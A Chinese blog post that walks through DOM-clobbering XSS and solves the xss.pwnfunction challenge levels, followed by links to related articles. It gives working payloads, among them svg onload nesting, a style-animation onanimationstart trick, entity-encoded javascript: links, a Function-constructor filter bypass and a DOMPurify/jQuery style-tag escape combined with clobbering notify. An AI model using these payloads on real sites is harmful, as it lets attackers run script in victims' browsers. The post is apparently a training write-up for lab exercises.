XSS的DOM破坏

已于 2024-08-17 22:21:49 修改
阅读量523 收藏 4
点赞数 13
分类专栏: 安全 文章标签: xss vue.js javascript 网络 安全 网络安全 前端
于 2024-08-17 19:11:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67441173/article/details/141270691
版权

目录

1、DOM破坏案例实操

1.1先写一个demo.html文件

1.2、执行demo,看到是否将全部移除%20scr=1%20οnerrοr=alert(1)>

分析:

解决:把两个for不在同一个数组进行操作

1.3、接下来我们要想办法让第二个for循环不能删除,留下我们非法的函数,有两个方法

1.3.1用两个标签

1.3.2用DOM破坏实现:用

2.XSS的闯关

2.1Ma Spaghet!

2.2Jefff

2.3 Ugandan Knuckles

2.4Ricardo Milos

2.5Ah That's Hawt

2.6Ligma

2.7Mafia

2.8Ok, Boomer

2.9ww3的DOM破坏

2.9.1分析代码

2.9.2绕过过滤框架,html逃逸

过程解释:

最终传参

1、DOM破坏案例实操

1.1先写一个demo.html文件

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="author" content="system">
    <meta name="keywords" content="whoami">
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <title>
        <script>alert(1)</script>
    </title>
</head>

<body>
   <div class="aaaaa" id="bbbbbb">aaaaaa</div>
</body>
<script>
    const data = decodeURIComponent(location.hash.substr(1))
    const root = document.createElement('div')
    root.innerHTML = data //给div赋值

    for(let el of root.querySelectorAll('*')){ //把标签里面的属性全部拿出来
        for (let attr of el.attributes){ 
            el.removeAttribute(attr.name)  //在对获取的属性进行移除操作
        }
    } //获取div里面的子元素相当于
    document.body.appendChild(root);
</script>
</html>

1.2、执行demo,看到是否将<img%20scr=1%20οnerrοr=alert(1)>全部移除

 断点发现<img%20scr=1它可以移除

再加上一个属性,οnerrοr=alert(1)查看结果是否移除,结果发现他把合法属性移除而非法属性留下了

分析:

正常应该el要进入第二个for里面但是他没进去而是往上走判断了一下外层循环是否有第二个子元素,没有就直接走完了。这是因为在同一个数组上进行的操作就会出现这样的问题。例如加入abc三个元素,第一次删掉的是a,a的位置就空出来了b就往上顶,所以b没有删掉而是留下,相应往后推断就是偶数位的元素留下了,奇数位的被删掉了

解决:把两个for不在同一个数组进行操作

for(let el of root.querySelectorAll('*')){
        let attrs = [];
        for (let attr of el.attributes){
            attrs.push(attr.name)
        }
        for (let name of attrs){
            el.removeAttribute(name);
        }
    }

执行文件查看结果就将其全部移除了

1.3、接下来我们要想办法让第二个for循环不能删除,留下我们非法的函数,有两个方法

1.3.1用两个<svg>标签

127.0.0.1/demo.html#<svg><svg%20οnlοad=alert(1)></svg>,这里可以看到它已经执行了,但是代码看到其实是被移除了的

注:这里用一个<svg>标签或者外层套其他标签都是没用的

1.3.2用DOM破坏实现:用<style>标签实现

<body>
   <style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert()"><input id="attributes"><input id="attributes">
</body>

这里发现就执行了,原因:

这个<style>@keyframes x{}</style>标签定义一个空动画,这个动画x本身里面是由内容的,但是我们没有,所以调用了后面事件,在动画开始的时候会触发onanimationstart事件,进而执行。标签里面的内容不会删除,因为el.attributes已经被后门的两个<input>占了,所以只会删除他俩

 所以可以看到<div>下的<form>的<input>已经被删掉了

2.XSS的闯关

2.1Ma Spaghet!

HTML 5 中指定不执行由 innerHTML 插入的 <script>标签。所以换一个<img>

2.2Jefff

这道题危险出自eval,所以考虑用闭合将双引号闭合掉,然后再执行一下alert(1337)在进行一个闭合";

2.3 Ugandan Knuckles

input里面的单引号闭合可以实现onclick,用户一点击就可以执行,但是这道题不能和用户交互所以此方法不行。再input里面有个onfocus焦点可以实现不和用户交互就可以执行,但在这道题这个标签依旧需要用户点击才能执行,input有支持autofocus自动对焦,这样就可以了

2.4Ricardo Milos

form表单的action有个伪协议,这里面是2秒后自动提交就可以直接做了

2.5Ah That's Hawt

<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

我们先分析代码,正则表达式过滤了什么,()`\并且是全局过滤,这样一来,不能使用()就对弹窗很不利,那么我首先想到的办法就是编码,利用编码绕过

浏览器解析顺序:URL 解析器->HTML 解析器-> CSS 解析器->JS解析器

<a%20href="javascript:alert%26%2340%3B1%26%2341">aaa

2.6Ligma

大A到大Z,小A到小Z,0-9不能使用,明显无法使用编码,改为urlcode编码方式

2.7Mafia

mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

还是先分析代码。明显可以看出,过滤了`, ', ",+,-,!,\,[,]并且过滤了弹窗函数alert,这样的一个正则,如果去绕过它呢

首先我们必须知道,弹窗最常用的三个函数,为alert、prompt、confirm,三个函数都能实现弹窗,那么第一个绕过的payload简单的有些过分

payload:prompt(1337);
payload:confirm(1337);

其他方式Function构造函数

Function(/ALERT(1337)/.source.toLowerCase())()

2.8Ok, Boomer

通过名称空间混淆突变 XSS绕过DOMPurify。假设我们有一个不受信任的 HTMLhtmlMarkup并且我们想将它分配给某个div,我们使用以下代码使用 DOMPurify 对其进行清理并分配给div:

div.innerHTML = DOMPurify.sanitize(htmlMarkup)

在解析和序列化 HTML 以及对 DOM 树的操作方面,在上面的简短片段中发生了以下操作:

  1. htmlMarkup 被解析为 DOM 树。

  2. DOMPurify 清理 DOM 树(简而言之,该过程是遍历 DOM 树中的所有元素和属性,并删除所有不在允许列表中的节点)。

  3. DOM 树被序列化回 HTML 标记。

  4. 分配给 后innerHTML,浏览器会再次解析 HTML 标记。

  5. 解析后的 DOM 树被附加到文档的 DOM 树中。

结合文章最开始所讲的知识就可以了,这里的javascript被禁止了,换一个白名单内的函数即可

最终传参

?boomer=<a%20id=ok%20href="tel:alert(1337)">

2.9ww3的DOM破坏

2.9.1分析代码

<!-- Challenge -->
<div>
    <h4>Meme Code</h4>
    <textarea class="form-control" id="meme-code" rows="4"></textarea>
    <div id="notify"></div>
</div>

<script>
    /* Utils */
    const escape = (dirty) => unescape(dirty).replace(/[<>'"=]/g, '');
    const memeTemplate = (img, text) => {
        return (`<style>@import url('https://fonts.googleapis.com/css?family=Oswald:700&display=swap');`+
            `.meme-card{margin:0 auto;width:300px}.meme-card>img{width:300px}`+
            `.meme-card>h1{text-align:center;color:#fff;background:black;margin-top:-5px;`+
            `position:relative;font-family:Oswald,sans-serif;font-weight:700}</style>`+
            `<div class="meme-card"><img src="${img}"><h1>${text}</h1></div>`)
    }
    const memeGen = (that, notify) => {
        if (text && img) {
            template = memeTemplate(img, text)

            if (notify) {
                html = (`<div class="alert alert-warning" role="alert"><b>Meme</b> created from ${DOMPurify.sanitize(text)}</div>`)
            }

            setTimeout(_ => {
                $('#status').remove()
                notify ? ($('#notify').html(html)) : ''
                $('#meme-code').text(template)
            }, 1000)
        }
    }
</script>

<script>
    /* Main */
    let notify = false;
    let text = new URL(location).searchParams.get('text')
    let img = new URL(location).searchParams.get('img')
    if (text && img) {
        document.write(
            `<div class="alert alert-primary" role="alert" id="status">`+
            `<img class="circle" src="${escape(img)}" onload="memeGen(this, notify)">`+
            `Creating meme... (${DOMPurify.sanitize(text)})</div>`
        )
    } else {
        $('#meme-code').text(memeTemplate('https://i.imgur.com/PdbDexI.jpg', 'When you get that WW3 draft letter'))
    }
</script>

只有输入正确才会返回值

这个题目的入口点是notify,如果它为真,我就可以在里面写一个html代码

那怎么让notify为真,很明显就要用到DOM破坏的技巧

解决:

2.9.2绕过过滤框架,html逃逸<script>标签

使用html()解析会存在标签逃逸问题。

两种解析html的方式:jquery.html&innerhtmlinnerHTML是原生js的写法,Jqury.html()也是调用原生的innerHTML方法,但是加了自己的解析规则

1、对于innerHTML

​模拟浏览器自动补全标签,不处理非法标签。同时,<style>标签中不允许存在子标签(style标签最初的设计理念就不能用来放子标签),如果存在会被当作text解析。

<style>
	文本
    <style/><script>alert(1337)//
</style>

2、对于Jqury.html()

最终对标签的处理是在htmlPrefilter()中实现:jquery-src,其后再进行原生innerHTML的调用来加载到页面。 ​

正则表达式在匹配<*/>之后会重新生成一对标签(区别于直接调用innerHTML) 所以相同的语句<style><style/><script>alert(1337)//则会被解析成如下形式,成功逃逸<script>标签。

<style>
    <style>
</style>
<script>alert(1337)//

//这里补上了一个</style>所以刚好和前面的凑成了一对,导致<script>逃逸出来了

过程解释:

DOMPurify的工作机制是将传入的payload分配给元素的innerHtml属性,让浏览器解释它(但不执行),然后对潜在的XSS进行清理。由于DOMPurify在对其进行innerHtml处理时,script标签被当作style标签的text处理了,所以DOMPurify不会进行清洗(因为认为这是无害的payload),但在其后进入html()时,这个无害payload就能逃逸出来一个有害的script标签从而xss

2.9.3覆盖变量notify,只有为真才能进入HTML里面才有可能绕过过滤

1、首先尝试用DOM-clobbering创造一个id为notify的变量,但是这种方式不允许覆盖已经存在的变量。

2、借助标签的name属性,document对象创造一个变量document.notify

最终传参

?text=<img%20name%3dnotify><style><style%2F><script>alert()%2F%2F&img=https://i.imgur.com/PdbDexI.jpg

这里按逻辑来说应该会有弹窗出来,但是我访问不了外网就访问不了那个图片路径所以没有加载出来

Hhmy
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
8、XSS 攻击的防御pdf资料
10-15
XSS攻击的破坏性不容小觑。 XSS漏洞通常分为三类: 1. 反射型XSS:这种类型的XSS是非持久性的,攻击代码包含在Web应用的URL参数中。攻击者通过向受害者发送带有恶意脚本的链接,当受害者点击该链接时,恶意代码被...
XSS防攻击实现
05-09
XSS(Cross Site Scripting)攻击是网络安全领域中常见的攻击方式之一,攻击者通过注入恶意脚本,使得用户在访问网站时执行这些脚本,从而窃取用户信息或破坏网站功能。防止XSS攻击是保障Web应用安全的重要环节。...
论文研究-一种基于DOM随机性的XSS漏洞动态检测方法 .pdf
08-15
XSS漏洞,全称跨站脚本攻击(Cross-Site Scripting),是一种常见的网络攻击手段,攻击者通过在Web页面中注入恶意脚本代码,当用户浏览该页面时执行这些脚本,从而盗取用户信息或对网站进行破坏。由于其威胁性较大,...
防止XSS攻击教程
06-03
- DOMXSS:恶意脚本不经过服务器处理,而是通过修改页面的DOM(文档对象模型)直接在用户浏览器中执行。 2. **输入验证与过滤**: - 对用户提交的数据进行严格的验证,限制允许的字符集和格式,避免特殊字符的...
xss防御之php利用httponly防xss攻击
10-26
XSS的危害极大,可以分为存储型XSS攻击、反射型XSS攻击和DOMXSS攻击。 为防御XSS攻击,开发者通常会采取各种安全措施,其中使用HttpOnly属性是一种有效手段。HttpOnly是一个安全机制,可以用来防止跨站脚本攻击...
XSS盲打与cookie劫持
m0_74249600的博客
08-14 849
本文紧接上篇文章讲述了XSS盲打、cookie劫持以及靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
XSS-过滤特殊符号的正则绕过
最新发布
2301_78549931的博客
08-17 351
结果为数字8680439也就是说我们利用parseInt函数将关键字变为一串数字,但数字肯定无法运行,我们还需要再变回去,要将一个数字转换为特定的。
反射型XSS的几种payload
m0_70638961的博客
08-17 321
符合web的解码顺序,所以可以被执行。和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造 XSS Payload 即可。
xss.pwnfunction-Easy
banliyaoguai的博客
08-17 404
然后要获取prototype携带的toString方法,且不能是Object.prototype下的字符串方法,因为后者返回的是一个元素,我们需要的是可控的字符串。然后你是用上面的两个属性弹窗一个属性就会以字符串的形式展示href里面的值,如果你用的是从object继承来的toString,就会返回一个对象,例子如下。我们看到innerHTML可以想到使用img标签,然后看到过滤了括号我们可以尝试使用location,然后使用%25编码%绕过()它匹配字符串 "ALERT(1337)"。
XSS跨站脚本攻击
m0_71864767的博客
08-16 795
\u0031\u0032在解码的时候会被解码为字符串`12`,注意是字符串,不是数字,文字显然是需要引号的,JS执行失败。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS可以解析Unicode的编码。#script属于原始文本元素只可以容纳文本,于是直接由JS处理,JS也认不出来,执行失败。#是RCDATA元素,可以容纳文本和字符引用,不能容纳其他元素。
XSS DOM漏洞复现 与DOM 破坏
iteuko的博客
08-17 285
此关过滤了字母数字,所以只能用编码去解决,去JSFUCK上面把alert(1337)编码,然后再编码成url编码格式 放入即可。第二种parseint 解析一个字符串并返回指定基数的十进制整数,radic是2-36之间的整数,表示被解析字符串的基数。指针的原理,删完一个,指针会后移动,所以删除1,3,5的位置 ,2,4位置保留,那么把payload写到2,4,位置即可。CSS动画,下面的el删除的是后面的input的内容,已经通过它们占了。获取到ok,会自动用tostring方法,获取href属性。
XSS项目实战
qq_68389880的博客
08-17 287
innerText函数会将'<','>'进行实体编码转义;ok传入了,但是后面的函数值被删掉了,这是因为javascript对于DOMPurify框架来说是黑名单,我们需要找到这个框架对应的白名单;过滤了'(' ')' '`' '\';过滤了alert函数,可以选择切换为confirm函数,但是意义不大;这道题过滤了'<''>';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';①弹出'1337';
XSS---DOM破坏靶场复现
qq_64395221的博客
08-17 448
但是没有任何反应,通过F12查看,发现img标签里面只有“src=1”,onerror=”alert(1)”被丢弃了,原因是存在DOMPurify.sanitize过滤框架,并且该框架绕过几率几乎很小。这是因为它的属性移除是在同一个数组上操作的,假如这个数组里有a、b、c三个 属性,当将a删除后,指针会往下走一步,但是由于第一位的a被删除,那么b会往上移一位,所以b不会被删除。将data插到div里, 获取div里面的子函数,拿到标签里面的所有属性,然后将属性进行移除。然而,嵌套结构中,内层的。
XSS Game练习
Pu5073的博客
08-17 435
1.Ma Spaghet 直接get传参 ?somebody=aaaa 直接使用img标签 ?somebody=<img%20src=1%20onerror="alert(1337)"> 官方文档 应使用innertext,安全性更高 2.Jefff 通过代码可以知道是通过eval的代码执行,setTimeout中的内容表示在一秒后执行一次 危险方法为eval,用双引号闭合即可 ?jeff=";alert(1337);" or ?jeff=";-alert(1337);-" 3
web常见漏洞——XSS
m0_64365018的博客
08-17 630
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等,xss又分为了三种类型分别为存储型反射型DOM型。
XSS反射实战
m0_65350813的博客
08-17 467
functiontest1() {alert"我是test1"
XSS实验记录
qq_58742048的博客
08-17 571
这里的代码使用get传参的方式,给jeff一个值,将值传给let jeff,变量ma然后执行Ma name +jeff传入的值,setTimeout是延时执行ma,同时ma还带了一个ineerText的属性。因为过滤掉了(),所以script无法使用,这里使用img的报错实现,因为括号被过滤,使用实体编码进行绕过。在定时器里有一个submmit这个提交事件,获取了from表单的id,在两秒钟进行action的自动提交,而这个action是他接受的一个伪协议。或是使用eval函数来进行转写。
XSS靶场————XSS.pwnfunction
m0_69151365的博客
08-17 344
这关他用了写一个一个过滤框架,他这个框架我对我们输入的代码进行一个过滤,将危险代码去除,所以我们的危险代码是不起作用的,所以我们再想想有没有别的方法,看看这个setTimeout(ok,200),这个定时器有什么作用的,在这个代码里显得非常多余,所以这也是我们突破的点,这里ok会被执行,我们写一个标签也给他赋值为ok,这时候这个标签就会被这个定时器,执行语句就用伪协议,js中伪协议有很多,这个框架将所有的伪协议过滤是不现实的,所以我们找到他过滤的白名单就行了,我们试试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值